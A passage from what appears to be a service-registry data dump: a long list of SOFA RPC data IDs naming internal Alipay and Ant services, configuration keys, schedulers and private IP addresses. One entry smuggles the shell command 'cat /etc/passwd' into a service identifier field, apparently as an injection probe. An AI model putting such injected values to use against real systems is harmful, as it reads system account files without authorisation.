ANCE_ID#@#SOFA_ROUTER","com.alipay.fc.operator.common.service.facade.OperatorRelAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.facade.api.category.MsContentCateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditrmp.facade.alert.MonitorAlarmManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.manualOrderClose,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antinvoice.biz.flow.manager.EinvTradeSyncManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.HufuFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.top.agent.TopAgent:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","io.sofastack.cafe.workflowx.sofarpc.facade.WorkflowxRPCInvocationFacade:1.0:workflowRpcInvocationHub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bpaas.ecogw.facade.EcoGwTestFacade:1.0:ecoGwTestFacade_sdk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.reyInvoiceTaskLoop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:tiyubiz@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:zimtmsvcprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.CampRelateSubjectService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantOrderGzoneQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.mpcard.MPcardRzoneQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata3.schedule.rpc.service.consistency.ConsistencyOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotetradecore.common.service.facade.api.StockProrityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:grmcore_program_pass_process_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:ipsponsorprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.namelist.GreyListWriteService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodswitch.common.service.facade.OperateLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.apshopcenter.common.service.facade.RateCampQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.232.225#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA-SCHEDULER-S-S-instopen-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insusercenter.facade.thanks.api.InsThanksEvaluationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mordercenter.common.service.facade.api.TaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:cat /etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.core.service.repository.quotation.SnapshotRepository:1.0:memoryCachedSnapshotRepository@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobileappcommon.common.service.facade.baas.FlowTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insscenemarket.common.facade.InsMktPrizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.dynamic.facade.WordQuestionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.56.160#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fraudmng:name=com.alipay.rule.core.publish.drm.RulePublishResource.enableHuffman,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_S_DBACKPRODRECEIPT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Servers_TP_O_ZFALCON#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeService:1.0:baoxiangw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openbizmock.integration.opencore.AppApiClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.custrelation.service.facade.MobileContactService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:pcreditint@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.162.7#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.certifymng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInMatchAllRequest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.assettrans.facade.faasset.api.settle.FaTransSettleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.168.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.idpatrol.core.service.inspect.camp.service.CheckPmsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.cloudbox.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:throwErrorAbilityCallbackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prizecore.common.service.facade.service.PrizeReceiveService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.content.service.facade.QRDecodeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.card.service.DirectCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datariskmarket.facade.RmMetaDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbusinessprod.common.service.facade.api.MybankBizFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:hb_product_order_auto_cancelled_import_handler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frgcenter.common.service.facade.api.RemoteComponentServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.common.service.config.facade.TransactionConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.rulecenter:name=com.alipay.rulecenter.core.engine.drm.impl.LogStrategy.threadhold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:apshopcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instasset.client.AssetRemoteService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mydds.core.engine.service.api.ValidationService:1.0:mdevsupport@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_KBITEMPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iopencore.common.service.manager.EnvConfigDTOManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.test.StructuredDepositsPushActionTest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.98.81#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.177.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservicesinspect.biz.shared.feature.RearDetectFeatureActuator:1.0:rearWhitePageDetectActuator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chargefront.service.facade.api.ChargeFrontProdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ipayment@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_MYCHAIN_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cifcommon.business.platform.o2o.facade.JobConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.228.205#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:uioservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.appointment.api.AppointmentConfQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.137.190#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.FinVoucherControlResource.finCommonCouponMaxOverPublishRatio,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antfin.arc.job.processor.core.service.rest.AntvipEndpointRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.csplatform.service.facade.api.MerchantExclusiveActorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:safeproductionportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.scheduler.BatchTaskStatusQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlsmicrogw.common.service.facade.gateway.api.ElementInfoQwtFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mobileapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkebank.common.service.qianniu.QianNiuFinanceCenterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpromoprod.common.service.facade.spring.YebSpringCampFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.punishcenter.common.service.facade.StrategySelectService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininsightcore.common.service.facade.feature.AntFeatureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeexprod.facade.OssFileOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ctu.service.riskprofile.facade.RiskProfileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:app2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.fop.api.MenuQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.ProfileConsistQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudatlas.accatracequery.facade.TraceBizLogQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:girisk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.core.service.repository.promo.rzone.CommonInviteRecordRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:shopCategoryCityValidator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.129.246#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitydata:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.80.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iexratecenter.service.facade.api.ExSourceRateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.StaffFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.zpaas.zpaas_ds.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.chaos.dig.facade.drm.ProduceRiskValueFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileappconfig.common.service.facade.api.AppMaintainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:poseShopUpdateRiskAuditExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.ProdCommentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.serverlessfeature.ServerlessFeatureFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.csguide.service.facade.template.api.TemplateRenderingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchselfop.mrchworkbench.panama.facade.TaskSecretKeyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.cardbinMdmTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.218.144#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-wealthyebtwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.repository.UserLoanAccountBalanceRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscenesas.batch.test.MockExecuteTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotonemng.common.service.api.GotoneMessageConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.common.service.facade.api.ToolRelationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.227.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.yebcore.common.facade.subcard.query.YebSubCardQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.cif.client.drm.ClientLogControlDrmSwitch.riskmng.censusLogSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_DAS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.ctudb.CtuSceneRiskQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiangw.common.service.dic.InsDicQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdatalab.common.service.facade.project.DomainQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@antmember#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.pcreditbatch.service.MYBKAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwsap.common.service.facade.datasource.OdpsTableSpeedupService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.user.UserAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ifccommon:name=com.alipay.fc.common.loadtest.drm.LoadTestSwitchControl.supportLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insbenefitprod.common.service.BenefitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditprod.service.PcreditAgreementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloanrepay.common.service.facade.api.LoanRiskManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_123_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.lifemsgprod.common.service.facade.task.SmartMsgQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insptmarket.client.history.extension.HistorySnapshotFetcherComponent:1.0:insxhbprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.biz.shared.match.repository.impl.MatchAppointmentHourDataStatModelRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitradeprod.core.service.settle.repository.TradeRticipantRepository:1.0:gzoneTradeRticipantRepository@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.service.facade.api.MerchantCampConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tr-service-enable:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcalp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:inshealthcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.metadata.RegionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ANTIA#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirefront.service.facade.api.AcquireTradeBatchQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mfinstockprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:sendNormalFeedbackCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.core.model.antworkbench.repository.AntTargetRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.161.29#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_10.15.237.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finsnsbff:name=com.alipay.finsnsbff.stock.isDowngradedStockHomeForum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.core.service.InspectTaskDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openauth.common.service.facade.authtoken.Oauth2TokenService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.credible.CtuCrediblePcidService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpublish.common.service.facade.CallbackServiceFacade:1.0:ecmng@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.46.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.clivemng.common.service.facade.api.signup.ClvUserGraylistQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.budgetcore.core.control.BudgetControlComponent:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.test.ClearingMessageTest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.cschat.common.service.facade.api.VisitorQueueQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.injectClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundasset.common.service.facade.api.FundAssetProfitCalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-finriskmngcore-daemon-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cfpcenter:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.girisk.common.service.facade.api.risk.OutRiskEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.SecurityProductApplyQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.cases.rpc.AnnotationSampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.hbase.HbaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dms.common.service.PAISingleNodeConstructService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.common.service.facade.api.QueryPlanFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:lendpofprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.authcenter.service.facade.PlatformOauthServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_uioservice_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-S-finstrategy-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.appcompass.common.service.facade.efficiency.MetricResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fapcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCacheCZone.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.qianli.common.service.neardata.facade.QianliQueryConfigFacade:1.0:messagefusion@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpipe.zqueue:qaZQueue48:twolevel2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.acrule.service.facade.api.InnerRuleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.facade.ReportInstFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.119.208#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.dt.onedata.dwm.client.definition.GranularityOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_PAYBATCH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Servers_TP_C_FINSUPPORT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfoprod.common.service.cds.facade.FrameCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_mobileops_datasync#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:antlaw@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaymember.common.service.facade.config.service.PrivilegeConfigManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.relation.RelationManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.code.api.CiAttackApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.service.cacheclient.drm.ClientCacheConfigDRM.clientFlowStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.87.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antdsm.common.service.facade.RuntimeConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.libracore.common.service.facade.api.PricingFactorManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_bkBenefitTemplateCancelCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.mini.resource.MiniResourceRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoplatform.core.service.component.dingding.RobotService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_B_TRADE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lendpofprod:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInBizValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zdataquery.common.service.facade.promo.PromoOfflineScriptService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.mwalletmng_mobileShardDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.icfmng.common.service.facade.api.MultiLanguageMappingConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.sdk.com.facade.api.NodeOperationApi:1.0:schedule-operation-platform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpaasweb.common.service.facade.replays.OdpsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.offer.ContentOfferRelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.livekit.LiveAnchorBindingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reservecenter.facade.api.PaymentFileBatchQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.facade.api.DishonoredApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSchedulerDRMResource.wfinUserCountOption,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrmcore.common.service.facade.service.model.MdpModelQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.UserAccoutQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.processmngTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.infosecTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finslip:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.workflow.WorkflowRemarkFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.EmailAckCodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.dback.api.OnlineDepositBackBatchQuerySer